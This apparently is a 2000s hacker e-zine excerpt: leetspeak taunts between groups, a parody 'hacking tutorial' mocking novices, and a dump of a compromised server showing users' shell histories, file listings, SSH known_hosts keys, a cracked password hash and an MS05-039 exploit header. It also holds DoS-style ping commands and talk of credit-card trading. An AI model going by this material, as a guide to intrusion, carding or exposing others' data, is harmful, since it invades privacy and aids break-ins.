[MSGS ] [11:01am] - arcanum arc@mall.pulltheplug.com 26 PAIRS READ IN
[SEND_MSG] [11:15am] - arcanum cool
[SEND_MSG] [11:19am] - arcanum does it work tho ?
[MSGS ] [11:19am] - arcanum arc@mall.pulltheplug.com not finished
[MSGS ] [11:20am] - arcanum arc@mall.pulltheplug.com and i wont know until you test it
[MSGS ] [11:20am] - arcanum arc@mall.pulltheplug.com cuz i aint doing no spam runs on my machine
S0 H3R3Z TH3 BR34KD0WN...
K4S.N3T IS .AU
PTP 1Z M0STLY .AU
K4S.N3T SP4MZ L1K3 CR4ZY.
PTP 1Z BR0K3.
K4Z.N3T SP4MZ L1K3 CR4ZY.
PTP C4N C0D3 SP4M T00LZ F0R K4Z.N3T.. 1F K4Z.N3T _D03ZNT T3LL 4NY0N3_!!!
H0NO H4QZ.
H0NO L4UGHZ@1RC CH4TZ
H0NO RM'Z 100 GIGZ 0F 3M41L 4DDR3ZZ3Z, SP4M T00LZ, & 4LL TH3 B0X3Z.
H0NO H0P3Z T0 BR1NG S0M3 S3NS3 T0 PTP M3MB3RZ. K4S.N3T M3MB3RZ 0N TH3 0TH3R
H4ND R H0P3L3ZZ.
PTP: QUIT H4Q1NG. Y0U SUQ @ 1T. QUIT SP4MM1NG T00, 0R W3 W1LL S3ND ZONE-H DDOS
N3T T0 Y0UR IRCD!!!!
20.txt -~-~-~ how hack in pc
by r4t
----
AEUhUEAhuEA helo frends this r4t im hear too say that ya im a haker n such
AEUhUEAhuEA butt thats byond point--- i doing this 4 my frends like tal0n aka
skew who seem to disppeareded???? u see i hack in to meny peple an i buy shell
with cc AEUhUEAhuEA that how elite be after r4t teech u how!!!!!!! no bad guy
hurt u coz u kno how hack yes???? rdy
how to hack in computer tutoriel.....
things i will cover-----
0. introducion
1. what internet is???
2. how login to telnet???
... wat telnet is???
3. how trade cc???
4. my hacker story pome
5. this is done AEUhUEAhuEA
if u thnk this may b hard well ya it is AEUhUEAhuEA but relex coz i good techer
rdy 2 tech u how AeUhEuUehHeu wel .br is hacker capitel of world an i from that
so.................... here go
-------------------------- what internet is??? ---------------------------------
AEUhUEAhuEA internt is freedum freedum too hack it is allow u too tlk 2 peple and
wel u can hack to vary vary good hack tool is internet!!!!!!!! AEUhUEAhuEA
it is network allow u tooo wel i duno but it is big big big bgi big big netwerk kk???
-------------------------- how login to telnet??? ------------------------------
all .br hacker no telnet best tool for hack!! stuped usa hacker say no but usa
hacker = bad AEUhUEAhuEA
fuck u usa AEUhUEAhuEAEUhUEAhuEA!!!!!!
telnet make u hack in comps coz u tipe
r4t@redhat9:~$ telnet www.google.com
yea wel mabe u mite not able to do gogle buttttttt u do other!!!!!!!!!!!
:)
u put in port like telnet www.google.com 22
i thnk mabe port 22 = hack port but mabe not duno :( :( :(
this is zeroday methid of hack so u tell every1 AEUhUEAhuEA :)
and hack hack hack u do thru port AEUhUEAhuEA
coz ports r wut u hack!!!!!!!!!!!
this wot all elite hacker do so u lissen too me u be elit AEUhUEAhuEA
ok this extra 4 telnet but u hack hurt sum1 pc if u do ping
r4t@redhat9:~$ ping -t -l 65535 www.google.com
AEUhUEAhuEA they fucked :) :) :) :) :)
now r4t show u how trade cc very good way to be hacker
---------------------------- how trade cc??? -----------------------------------
ok cc vary vary vary good 4 buy shell 2 hack with u go on efnet in hacker chanel
<r4t> need cc kk i give root 4 redhat9
then giv root on your pc and they trikked :) :) AEUhUEAhuEA
<superhacker> 0k4y y0 3y3 g0t 4 cc f0r y0u
<r4t> plz plz plz i giv root on redhat pc for u hack with AEUhUEAhuEA
<r4t> i need bad kkkkk
<superhacker> (i senser number coz i use :) :))
<superhacker> wh4tz th3 l0g1n cr3d3nt14LZ f0r th3 r3dh4t 9 b0x?
<r4t> i trik u AEUhUEAhuEA
<superhacker> g1v3 0r 3y3'll pull & dr0p yu0r d0x
<r4t> ok ok ok ok AEUhUEAhuEA i sory
<r4t> **.***.**.*** l: root p: r4t
<superhacker> n1c3 p4zzw0rd
<r4t> thank u i no its secure wot bout u
<superhacker> wh4t3v3r f4g
* r4t has left #creditcardzforlife (0wn3d) *
ok that woz mistace didnt meen 2 post but my pc not let me dlete :( :( :(
u sea how i bargin good???? now u go get cc n be hakker to AEUhUEAhuEA
i make good deel on cc trade
it vary vary sekere to use efnet but AIM beter AEUhUEAhuEA
butt superhacker pay big time for calleng r4t fag :)))
darpanet soon hack him thay good hacker to AEUhUEAhuEAEUhUEAhuEA
cc number vary usefel for buy shell to hack with!!!!!!!!
then telnet and u in 2 box u hack!!!!!!!!
but when telnet honeypot u do
r4t@redhat9:~$ ./telnet-dos -h www.google.com
AEUhUEAhuEAEUhUEAhuEAEUhUEAhuEA thay fuck :))
xort do good job on telnet-dos.c thank :) :) :)
but u want beter!!!!!!!!!!!!
r4t@redhat9:~$ ./megaDoS -h www.google.com
AEUhUEAhuEA thank u rotor astralien frend AEUhUEAhuEA
ok now u want cc so u buy shell to hack frum kkkkk go
aol instint mesinger chatrom nameded thisisnotcctradingchat
thay vary trust i thare so u say hi :) :)
if u want find version in ipv6!!!!!!!!!!!!!!
o wate must look up for how compeil c program
ok found AEUhUEAhuEA
r4t@redhat9:~$ ./cb4n6
thank u rotor u big help AEUhUEAhuEA
for scan cisco trade for cc u do perl c1zc0-mgx.pl vary vary good k
thank u for reding cc totoriel
---------------------------- my hacker story pome ------------------------------
i am r4t uberhacker
carolin meinel teech me how hack
she good look womin so i fuck her
she teehc me how compeil 0day
i am happy hacker AEUhUEAhuEA
she good hacker
i am to
i find friend like in movie hackers
but i beter then zerocool AEUhUEAhuEA
i lern qbasic
i lern visal basic
vary good hack lang
i rite windows shell code in visal basic
it make uhacked.txt AEUhUEAhuEA
my name r4t
cuz i sneeky like r4t
u no find me when i hack u AEUhUEAhuEA
my english not bad like peple say
i take it for 6 year in high schol
i stil in high scool AEUhUEAhuEA
i hack u useng sub7
now u feer coz im elit
u no mess with r4t AEUhUEAhuEA
i hack .br sight with tal0n
he good hacker to
but not as good me AEUhUEAhuEA
u no sea me enter u pc
fuck AEUhUEAhuEA
my name r4t
i am ultimit hacker
-------------------------- this is done AEUhUEAhuEA ------------------------
thank for reeding totoriel u wil becom good if u keep doing hack AEUhUEAhuEA
if meet u and carolin meinol she teech vary well how hack and u becom good
uberhacker AEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEA
she tell u it ok to put passwerd thru plain text protocal wotever that AEUhUEAhu
but she smrt keep hack keep hack keep hack u get 0day trade cc# thx
now i go play floot now u shood to cuz that hacker instrimint
AEUhUEAhuEA
AEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEU
AEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEUhUEAhuEAAEU
KEEP HACKENG FUCK USA AEUhUEAhuEA
end of feil or wotever AEUhUEAhuEA
21.txt -~-~-~ di0ad 1z t04zt3d
w3 g0t th3 fbsd w4r3z fr0m a z0n3-h 4ffl1l14t3 4nd cl0s3 fr13nd 0f w00d'z. lucky
f0r d104d 0ur fr13nd d1dnt h4v3 fbsd ruzz14n r0ul3tt3 sh3llc0de 0r y0ur wh0l3
l4n w0uld b3 l1nk d34d r1ght n0w.
w3 st1ll l0v3 y0ur m0m di0ad!! d33pm4g1c rulezzZZzzZzz!!!
sh-2.05b$ uname -a
Linux core.joyservers.net 2.4.2 FreeBSD 5.4-RELEASE-p6 #0: Tue Aug 2 18:35:51 UTC 2005 i686 i686 i386 GNU/Linux
sh-2.05b$ echo 'wh--h00, w3 g0t 0d4yz 4 th@'
'wh--h00, w3 g0t 0d4yz 4 th@'
sh-2.05b$ w
9:34PM up 38 days, 2:02, 1 user, load averages: 0.07, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE WHAT
di0ad p0 pcp0010235481pcs 5:02AM 15:57 -bash (bash)
sh-2.05b$ id
uid=1014(di0ad) gid=1015(di0ad) groups=1015(di0ad)
sh-2.05b$ ls -al /home/di0ad
total 2684800
drwxr-xr-x 13 di0ad di0ad 1024 Dec 11 05:39 .
drwx--x--x 21 root wheel 512 Dec 10 01:52 ..
drwx------ 3 di0ad di0ad 512 Dec 11 21:07 .BitchX
drwxr-xr-x 2 di0ad di0ad 512 Nov 19 2002 .Mantis
-rw------- 1 di0ad di0ad 5238 Dec 12 02:54 .bash_history
drwx------ 3 di0ad di0ad 512 Aug 11 04:15 .bittorrent
-rw-r--r-- 1 di0ad di0ad 767 Aug 4 01:40 .cshrc
drwx------ 2 di0ad di0ad 512 Aug 14 22:37 .irssi
-rw-r--r-- 1 di0ad di0ad 248 Aug 4 01:40 .login
-rw-r--r-- 1 di0ad di0ad 158 Aug 4 01:40 .login_conf
-rw------- 1 di0ad di0ad 373 Aug 4 01:40 .mail_aliases
-rw-r--r-- 1 di0ad di0ad 331 Aug 4 01:40 .mailrc
-rw-r--r-- 1 di0ad di0ad 797 Aug 4 01:40 .profile
-rw------- 1 di0ad di0ad 276 Aug 4 01:40 .rhosts
-rw-r--r-- 1 di0ad di0ad 975 Aug 4 01:40 .shrc
-rw------- 1 di0ad di0ad 24 Oct 4 07:49 .spamkey
drwx------ 2 di0ad di0ad 512 Aug 13 03:04 .ssh
drwxr-xr-x 2 di0ad di0ad 512 Dec 12 05:37 C
-rw-r--r-- 1 di0ad di0ad 0 Aug 22 04:47 MO002.wmv
-rw-r--r-- 1 di0ad di0ad 24745 Aug 22 04:47 MO002.wmv.torrent
-rw-r--r-- 1 di0ad di0ad 29238 Aug 4 03:53 MantisBX1.4.tar.gz
-rwxr-xr-x 1 root di0ad 85801 Aug 16 21:02 aircrack
drwxr-xr-x 5 root di0ad 512 Aug 16 21:00 aircrack-2.21
-rw-r--r-- 1 root di0ad 228844 Aug 16 21:00 aircrack-2.21.tgz
-rw-r--r-- 1 di0ad di0ad 2141 Aug 17 00:40 bah.rar
drwxr-xr-x 10 di0ad di0ad 512 Dec 12 05:18 cyp
-rw-r--r-- 1 di0ad di0ad 63000 Aug 4 03:51 cyp01kb2.tar.gz
-rwxr-xr-x 1 di0ad di0ad 4876 Oct 15 03:22 fawk
-rw-r--r-- 1 di0ad di0ad 52 Oct 15 03:22 fawk.c
-rw-r--r-- 1 di0ad di0ad 363440606 Aug 14 07:56 irc.dickscab.tgz
-rw-r--r-- 1 di0ad di0ad 24512911 Aug 16 20:47 kolb.cap
-rwxr-xr-x 1 di0ad di0ad 15880 Aug 17 04:00 login
-rw-r--r-- 1 di0ad di0ad 252108 Aug 17 00:39 m0d.rar
-rw-r--r-- 1 di0ad di0ad 270006523 Aug 16 23:10 ms visual studio enterprise 6.0 With SP5 and Key.rar
drwxr-xr-x 4 di0ad di0ad 512 Aug 17 03:52 ownage
-rw-r--r-- 1 di0ad di0ad 2141 Aug 17 00:40 owns.rar
drwxr-xr-x 6 di0ad di0ad 512 Aug 20 03:09 tmp
drwxr-xr-x 2 di0ad di0ad 512 Oct 6 2003 tux-2.0
-rw-r--r-- 1 di0ad di0ad 12865 Aug 4 03:50 tux-2.0.tar.gz
-rw-r--r-- 1 di0ad di0ad 55108 Aug 22 04:38 xf.torrent
-rw-r--r-- 1 di0ad di0ad 714997760 Aug 22 09:35 xxx fr-la cambrioleuse-clara morgane.avi
sh-2.05b$ cat /home/di0ad/.bash_history
Session aborted
cat john.pot
$1$KYPEeOrw$khYXZnLnfFfMm15bNiNTA/:ruboard
w
who
last -20
w
ps ax
top
w
exit
w
su -
w
su -
screen -r
w
screen -r
date
w
exit
BitchX -H deepmagic.org di0aD irc.efnet.net
BitchX -H deepmagic.org di0aD irc.efnet.net
BitchX -H deepmagic.org di0aD irc.efnet.net
w
exit
w
screen -r
w
exit
w
ssh root@208.53.170.51
traceroute mcxnet.com
w
ps ax
su -
w
ls
pwd
ls -s
su -
exit
w
su -
w
ls
w
top
ls
cd xbox
ls
ls -s
btdownloadcurses.py Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER.torrent
screen -S torrent
screen -r
w
w
screen -S torrent2
w
exit
w
cd xbox
ls
cd Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER
ls
tar zxvf Grand_Theft_Auto_San_Andreas-XBOXFiX-READ_NFO-iND.tar
ls -l
cat gtasx-dgr.nfo
ls
cat gtasx-dgr.sfv
ls -a
w
screen -r
screen -r torrent
screen -r torrent2
screen -r torrent
screen -r 95084
pwd
ls
ls
ls
btdownloadcurses.py Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER.torrent
lynx
lynx
lynx http://www.mininova.org/get/98240
btdownloadcurses.py hulk.torrent
btdownloadcurses.py hulk.torrent
pwd
exit
w
ls
cd xbox
ls
screen -r
screen -r torrent2
screen -r torrent
screen -r 95084
screen -S tor
screen -S t3
w
df -h
w
ls
w
last -20
screen -S fan4
screen -r
screen -r torr
screen -r
screen -r tor
screen -r 26955
screen -r
screen -r t3
screen -r fan4
w
ls
ls
screen -r
screen -r tor
screen -r fan4
screen -r to
screen -r
screen -r t3
screen -r tor2
screen -r tor
screen -r 26955
w
ls
screen -r
screen -r tpr
screen -r tor
screen -r torrrent2
screen -r torrent2
screen -r tor
screen -r 26955
screen -r
screen -r fan4
screen -r t3
w
last -50
screen -S efnet
w
exit
w
whois ownz-you.com
whois ownz-you.info
whois ownz-you.info
whois ocjnet.com
whois ocjnet.org
whois deepmagic.net
screen -r
screen -r efnet
w
ps ax
screen -r t2
screen -r t3
screen -wipe
screen -r
ps ax
scr-bx
ps ax
netstat -tan
w
su -
screen -r
w
last -5
w
exit
who
screeb
w
date
cd /var/log
ls
dmesg
dmesg|more
ls
cat security
su -
w
ls
w
df -h
su -
BitchX -H WhoresR.US di0aD irc.efnet.net
su -
BitchX -H WhoresR.US di0aD irc.efnet.net
BitchX -H WhoresR.US di0aD irc.efnet.net
exit
w
screen -r
screen -S efnet
w
exit
w
ls
su -
exit
w
su -
su -
screen -r
ls
cd xbox
ls
cd Brothers-In-Arms.torrent
Brothers.In.Arms.XBOX-WAM
Burnout 3 - Takedown Xbox USA Full DVD - Team USA
Burnout3.torrent
Fantastic 4 USA_XBOX
Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER
Grand_Theft_Auto_San_Andreas-USA-XBOXDVD-DAGGER.torrent
Madden_NFL_06_Usa_Xbox-RiOT
XBOX-The Incredible Hulk Ultimate Destruction USA FULLDVD
XBOX-The.Incredible.Hulk.Ultimate.Destruction.USA.FULLDVD.torrent
doa3.iso
doa3.iso.torrent
fan4.torrent
hulk.torrent
madden06.torrent
ps
w
top
ps aux
w
exit
w
su -
exit
w
cd /usr
ls
cd xbox
ls
cd /usr/home
ls
su -
screen -r
w
exit
w
ps ax
w
top
w
date
ls
last -5
w
dmesg
ls
df -h
ifconfig
w
ls
w
ls
screen -r
screen -wipe
screen -S efnet
w
exit
w
su -
w
screen -r
w
exit
w
screen -r
w
exit
w
last -20
screen -r
w
exit
w
gcc -v
nano fawk.c
nano fawk.c
gcc -o fawk fawk.c
nano fawk.c
gcc -o fawk fawk.c
./fawk
cat fawk.c
./fawk
ls
w
ls
uname -a
man uname
uname -X
uname -i
uname -p
ps
ps ax
ps aux
dmesg
w
exit
w
su -
screen -r
nslookup soft.kongju.ac.kr
whois -h whois.apnic.org 203.253.42.77
whois -h whois.nic.or.kr 203.253.42.77
lynx ftp://www.kernel.org/pub/
ls
su -
screen -r
BitchX -H deepmagic.org di0aD irc.undernet.org
BitchX -H whoresr.us di0aD irc.undernet.org
exit
w
screen -r
screen -r
su -
exit
w
ls
screen -r
BitchX -H whoresr.us di0aD irc.dextroverse.org
screen -r
BitchX -H whoresr.us di0aD irc.dextroverse.org
BitchX -H whoresr.us di0aD dextroverse.mine.nu
screen -r
screen -r
w
top
ps
ps ax
ps ax|grep httpd
w
su -
BitchX -H deepmagic.org di0aD irc.rizon.net
exit
su -
screen -r
w
screen -r
su -
exit
w
whois ownz-you.com
exit
w
whois 69.42.68.184
traceroute 69.42.68.184
traceroute www.yahoo.com
who
traceroute 68.47.124.194
ping www.yahoo.com
su -
screen -r
pwd
cd /usr/xbox
ls
mkdir movie
cd movie
exit
BitchX -H deepmagic.org di0aD irc.rizon.net
exit
w
ls
lynx http://www.mininova.org/tor/125058
su -
screen -r
screen -S rizon
screen -r
su -
BitchX
w
su -
w
last -5
w
last -5
screen -r
w
last -20
w
su -
screen -r
su -
screen -r
whois deepmagic.net
screen -r
ping www.goinfantry.com
w
w
su -
w
w
ps ax|grep ident
su -
ps ax|grep ident
screen -r
screen -wipe
screen -S efnet
w
last -20
screen -r
nslookup ns1.inwood.cc
host -t NS inwood.cc
whois inwood.cc
whois inwood.cc
screen -r
w
exit
w
traceroute
su -
w
ls
su -
exit
w
ps ax
ps ax|grep httpd
cd /etc/init.d/
ls
./httpd start
su -
screen -r
w
host -t NS crysis.net
nslookup 208.53.135.200
host -t NS 208.53.135.200
su -
exit
BitchX -H twlc.info di0aD irc.undernet.org
BitchX -H twlc.info di0aD irc.freenode.net
w
w
screen -r
su -
pwd
cd /tmp
ls
cat art.txt
ls
cat mysql.sock
cat done.txt
ls
cd rdx-session-0.665204330653982
cat rdx-session-0.665204330653982
ls
ls -a
cd pear
ls
cd cache/
ls
ls -l
cd
lynx http://www.milw0rm.com/id.php?id=1337
ls
su -
exit
w
last -5
last -20
w
date
screen -r
w
exit
screen -r
cat /etc/passwd
su -
exit
w
last -20
screen -S bx
screen -r
exit
w
screen -r
screen -r bx
exit
w
screen -r
w
ls
cd C
mkdir C
cd C
ls
nano p1.c
gcc -o p1 p1.c
ls
./p1
cat p1
ls
cat p1.c
./p1
screen -r
screen -r bx
screen -r bx
W3 H4D A BL4ZT 4DD1NG R4ND0M B1TZ T0 H1Z .R4R F1L3Z. H0P3 Y0U D1DNT SP3ND
T00 L0NG D0WNL04D1NG TH3M. H4R H4R H4R!@#
sh-2.05b$ cat /home/di0ad/.ssh/known_hosts
mcxnet.com ssh-dss AAAAB3NzaC1kc3MAAACBAMUEmiZWiuizz/Bp6MWJcmmGMnlQMx9F/YcGEWNGJfMeSrnLiYr3uY2dYAB/IHVJVHQOsE/gy41OsQ9uziHM/BHcMBu+Vo7mRKfyu4Q5ugfBHdUdQdhizXwdcM+QEzKVL8dVEzD7izaFxHwKTLGzYKcW8IhP5cfsBMFgPsY2aIstAAAAFQCSm4AMntWMMGSuBpuEa5WFou5UFQAAAIABkWQ2GiWvQzSB1o4+ycp1lNlYijRCrcwcMB8F0aJgz9j0Y4rt2kNCw3NZ8+rktKBGSepHIkgC7Zbvi8DXIpESbrGUNTxKe9zjcJRAQU/YsIwV+W86a1XGSZhfUhmOd64AzgVvsNrVlu42kqSQgmFnaQyzLxtA2MOm3SSA69JtfgAAAIANJECDwQqYESsfASkZfjHCFWzVklvajh/IJJ7YCRTaBUDQFL0m52S1dMnkeorP7EujtaS65AbudAzDWfHiUN47ud3ckYDsBsWOtE0eNLOWJS6O0oPtvWlPGRwb55GqhlCnqPqYISKf8kJtIL6KZY0RXrNNxA1gw1kQjFH2gQxqpA==
sh-2.05b$ ls -al /home/di0ad/ownage
total 340
drwxr-xr-x 4 di0ad di0ad 512 Aug 17 03:52 .
drwxr-xr-x 13 di0ad di0ad 1024 Dec 11 05:39 ..
drwxr-xr-x 5 di0ad di0ad 512 May 10 2004 sk
-rwx------ 1 di0ad di0ad 165828 Aug 13 03:04 sk2-0x557-modified.tgz
drwxr-xr-x 2 di0ad di0ad 512 Aug 14 14:51 windows
sh-2.05b$ ls -al /home/di0ad/ownage/windows
total 60
drwxr-xr-x 2 di0ad di0ad 512 Aug 14 14:51 .
drwxr-xr-x 4 di0ad di0ad 512 Aug 17 03:52 ..
-rwxr-xr-x 1 di0ad di0ad 9986 Aug 14 14:51 039
-rw-r--r-- 1 di0ad di0ad 14522 Aug 14 14:51 039.c
sh-2.05b$ head -n9 /home/di0ad/ownage/windows/02 39.c
/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit + no crash shellcode
*
*
*
sh-2.05b$ cat /home/di0ad/fawk.c
#include <stdio.h>
main() {
printf("fawkers\n");
}
sh-2.05b$ /.h1dd3nw4r3z/h00ps rdx
sh-2.05b$ id
uid=1019(rdx) gid=1020(rdx) groups=1020(rdx)
sh-2.05b$ ls -al /home/rdx
total 5368
drwx--x--x 22 rdx rdx 1536 Dec 12 22:02 .
drwx--x--x 21 root wheel 512 Dec 10 01:52 ..
drwx------ 6 rdx rdx 512 Jun 7 2005 .BitTornado
drwx------ 3 rdx rdx 512 Jun 7 2005 .BitchX
-rw-r--r-- 1 rdx rdx 1240 Aug 11 04:40 .addon-installlog
-rw------- 1 rdx rdx 0 Aug 11 04:41 .addonscgi-MamboOpenSource
-rw------- 1 rdx rdx 0 Apr 17 2005 .addonscgi-PhpWiki
-rw------- 1 rdx rdx 0 Apr 17 2005 .addonscgi-PostNuke
-rw------- 1 rdx rdx 21 Apr 15 2005 .addonscgi-Xoops
-rw------- 1 rdx rdx 22 Aug 13 22:36 .addonscgi-e107
-rw-r--r-- 1 rdx rdx 5568 Dec 10 06:01 .bash_history
-rw------- 1 rdx rdx 14 Aug 19 07:34 .contactemail
drwx------ 2 rdx rdx 512 Dec 10 01:51 .cpanel-datastore
-rw------- 1 rdx rdx 100469 Oct 15 01:03 .cpanel-ducache
-rw------- 1 rdx rdx 15 Oct 19 02:48 .cpanel-logs
drwxr-xr-x 2 rdx rdx 512 Jun 7 2005 .entropybanner
drwx------ 2 rdx rdx 512 Aug 13 20:42 .gnupg
drwxr-xr-x 6 rdx rdx 512 Oct 19 02:48 .htpasswds
-rw------- 1 rdx rdx 13 Dec 11 06:26 .lastlogin
-rw-r--r-- 1 rdx rdx 36 Aug 13 20:49 .mailboxlist
drwx------ 3 rdx rdx 512 Jun 7 2005 .neomail
drwx------ 3 rdx rdx 512 Aug 29 23:07 .neomail-di0ad
drwx------ 3 rdx rdx 512 Aug 9 04:59 .neomail-diesl0w
drwx------ 2 rdx rdx 512 Dec 12 22:02 .spamassassin
-rw-r--r-- 1 rdx rdx 0 Aug 13 21:23 .spamassassinboxenable
-rw-r--r-- 1 rdx rdx 0 Aug 13 21:22 .spamassassinenable
-rw------- 1 rdx rdx 24 Sep 26 2004 .spamkey
drwx------ 2 rdx rdx 512 Aug 13 20:49 .sqmaildata
drwx------ 2 rdx rdx 512 Jun 7 2005 .ssh
drwxr-xr-x 5 rdx rdx 1024 Jun 7 2005 BitTorrent-4.0.1
-rw-r--r-- 1 rdx rdx 154427 Mar 25 2005 BitTorrent-4.0.1.tar.gz
-rw-r--r-- 1 rdx nobody 2191926 Dec 10 01:59 The_Shellcoders_Handbook.chm
drwxr-x--- 19 rdx rdx 512 Aug 1 02:10 backup-8.1.2005_02-05-10_rdx
-rw-r--r-- 1 rdx rdx 1537 Apr 14 2003 btcompletedir.py
-rw-r--r-- 1 rdx rdx 9163 Apr 14 2003 btcompletedirgui.py
-rw-r--r-- 1 rdx rdx 4728 Apr 13 2003 btmakemetafile.py
-rw-r--r-- 1 rdx rdx 5984 Apr 12 2005 btmakemetafile.pyc
drwxr-xr-x 4 rdx mail 512 Dec 10 01:55 etc
-rw-r--r-- 1 rdx rdx 561 May 3 2005 htaccess.txt
-rw-r--r-- 1 rdx rdx 18080 Aug 9 02:35 logo2.png
drwx------ 2 rdx rdx 512 Nov 30 00:17 logs
drwxrwx--- 4 rdx mail 512 Dec 12 22:02 mail
-rw-r--r-- 1 rdx rdx 6244 Sep 1 2003 maketorrent-1.2-src.zip
-rw-r--r-- 1 rdx rdx 1317 Apr 14 2003 maketorrent.nsi
-rw-r--r-- 1 rdx rdx 189 Apr 12 2005 playlist.txt
drwxr-xr-x 3 rdx rdx 512 Jun 7 2005 public_ftp
drwxr-x--- 12 rdx nobody 1024 Dec 10 01:52 public_html
-rw-r--r-- 1 rdx rdx 148729 May 5 2005 ss.tgz
drwx------ 7 rdx rdx 1024 Sep 22 17:54 tmp
-rw-r--r-- 1 rdx rdx 9 May 22 2005 unf.c
-rw-r--r-- 1 rdx rdx 198 Apr 12 2003 wincompletedirsetup.py
lrwxr-xr-x 1 rdx rdx 11 Aug 6 21:19 www -> public_html
sh-2.05b$ cat /home/rdx/.ssh/known_hosts
localhost ssh-dss AAAAB3NzaC1kc3MAAACBAMdGVIur4giy/GE66xRweySWOYfVenkc02x7BFSjFTVHIYN4Xedp31YQ/Fe3OaPFHrEw9/ybKJmCvR7vl0fpzYEk6+s8obvZmKoww48kWBCTA2eAb2B1+OlEVZmzGFRKNW6Xb3anrBZZe3SC27yfdUIBALFJKIQjbxPntT3Vnb71AAAAFQCUvaF/gvKICWVcviHn2SUeEhcxHQAAAIAi39dT9vaJndQJtboXEFZVgdkaTYmylCjY69U1ywEwTd7V1ONINmHH/qHUzDONqEWl+l77y4tbJysMWp2Xz3I0/CtAA5M4yF541GJM8VyJv20L9vJnC+WHDvT7OeNlDYsj2TW8tjTtrc4tEZJpWm3syC4hcjgjLqQBS6VqO+oJ4wAAAIAZ6KGwxmJB1n9KxDMcqe8ckE9B9/a2b4jdY2Uq6pbyecLkcR5JPEQ+/klYsEWJW4q4Oo8bgo9IMtJPpxNGR/e68FkBUBXvrBAiIJmmop0RNpEEBP8+DgwXAYz8MWQQu7KHdfsruM+td8OxIEG2f+0BO0e6iQ6xza3CejrCkTOpjA==
ftp.deepmagic.org ssh-dss AAAAB3NzaC1kc3MAAACBAMdGVIur4giy/GE66xRweySWOYfVenkc02x7BFSjFTVHIYN4Xedp31YQ/Fe3OaPFHrEw9/ybKJmCvR7vl0fpzYEk6+s8obvZmKoww48kWBCTA2eAb2B1+OlEVZmzGFRKNW6Xb3anrBZZe3SC27yfdUIBALFJKIQjbxPntT3Vnb71AAAAFQCUvaF/gvKICWVcviHn2SUeEhcxHQAAAIAi39dT9vaJndQJtboXEFZVgdkaTYmylCjY69U1ywEwTd7V1ONINmHH/qHUzDONqEWl+l77y4tbJysMWp2Xz3I0/CtAA5M4yF541GJM8VyJv20L9vJnC+WHDvT7OeNlDYsj2TW8tjTtrc4tEZJpWm3syC4hcjgjLqQBS6VqO+oJ4wAAAIAZ6KGwxmJB1n9KxDMcqe8ckE9B9/a2b4jdY2Uq6pbyecLkcR5JPEQ+/klYsEWJW4q4Oo8bgo9IMtJPpxNGR/e68FkBUBXvrBAiIJmmop0RNpEEBP8+DgwXAYz8MWQQu7KHdfsruM+td8OxIEG2f+0BO0e6iQ6xza3CejrCkTOpjA==
66.111.54.220 ssh-dss AAAAB3NzaC1kc3MAAAEBAPiiuWAyWzqgfkClgzjslJmVslnQsX10bAf2X2VdkS7rE9+w6bsVpuCQiMO2G2XxNcn0hjZlFN8TK35m48gjwy0nCpbFJ9F9dettokBcKye9Tr5giJsv9wzc7v0tT3A9J2fBJ6J0ZLeOjvNYk1o1nUwFlCE4EdvkQPq0RnV8Ftlab/y2M7uFJs8NMEnAkwrVpsVazpeNaZXNUE/Vv+lCh1J8N68+8O4wwdHcmXvuPtyRzwJk4Meu2yolf/0QpQrPisXxRdU7Q0hfjI98QE5gnDM1RqL7hNJcsFlZSovVl+f6qacNBgFDq2fNrzPp2HPISvbNs4QixZAeoApb7ifIaBMAAAAVAIvc80zhiF6KNbgkjojx+Y4ohnYlAAABAQCuVc74xoIaRg2QZvgvTeG/tFbuDy9Wsn3nEoghFwa8FQQH/EXMCbWUf/dSCeprk/Mx5o9E/5i9AXW3e67Nlp3/JtYSdkANXZkJjIvN5JQWxm+9srRmyopS2yesYlXpNRHIay/JFhN3MN6LiibBenfpcr9Zsnk6c/GIEAKzMdUNO4WA5FVFXD+VRVRFE69hdUOR2FzEHofHEBERbbpSdhQ8Rbcns8f+pJmKtu9wutW4xMVEqbzwWf6SkhjjJtydJzg5S7gyZMBUFIjuZj4yPUYutY/Qkv1MJPpWWDFgqQLZugiOTnAQMrPUnTIGUYMQLyBwlJhDDXDInZlSu3nU30hgAAABAHxlHSxixMRLOmtd2A5rCeViIDYdeH+bH8Sj0SoVPOLnAqZ/j2s4FWBvxLIJrNcxGEuquLGx8row3u1+UFCzR3WSe1YMO6NCr/DF9tGj40wA0cO9Dq6rJHKi33Z64lhhQ0kwZ0z8P8aBfy4lPKcQRNrwopB+MZE2WF08PkEfZQXcnTl59DsUqHH09J/OKxXU8OMGbGlIqF68UJrzSM1oXsxTIkJphINvNWGDeAdwCjtZKhOMvwlzHfv8CWRcvKtWOId+I3qGNHDLco6ylA5iQPwfQ434kP3qYvuN9Tqpq+01yM2KVobGJqTCi/fYt70UeNQhqxULvbndnJ+Jnzz+Pqw=
sh-2.05b$ /.h1dd3nw4r3z/h00ps subz
sh-2.05b$ id
uid=1011(subz) gid=1012(subz) groups=1012(subz)
sh-2.05b$ ls -al /home/subz
total 97472
drwx--x--x 13 subz subz 512 Dec 9 22:14 .
drwx--x--x 21 root wheel 512 Dec 10 01:52 ..
drwx------ 3 subz subz 512 Jun 7 2005 .BitchX
-rw-r--r-- 1 subz subz 5520 Nov 23 20:20 .bash_history
-rw------- 1 subz subz 14 Aug 6 05:57 .contactemail
drwx------ 2 subz subz 512 Oct 28 19:09 .cpanel-datastore
-rw------- 1 subz subz 12 Oct 28 19:09 .lastlogin
-rw------- 1 subz subz 24 Feb 27 2005 .spamkey
drwx------ 2 subz subz 512 Jun 7 2005 .ssh
drwxr-xr-x 4 subz subz 512 Jun 7 2005 .tmp
drwxr-xr-x 2 subz subz 512 Jun 7 2005 blah
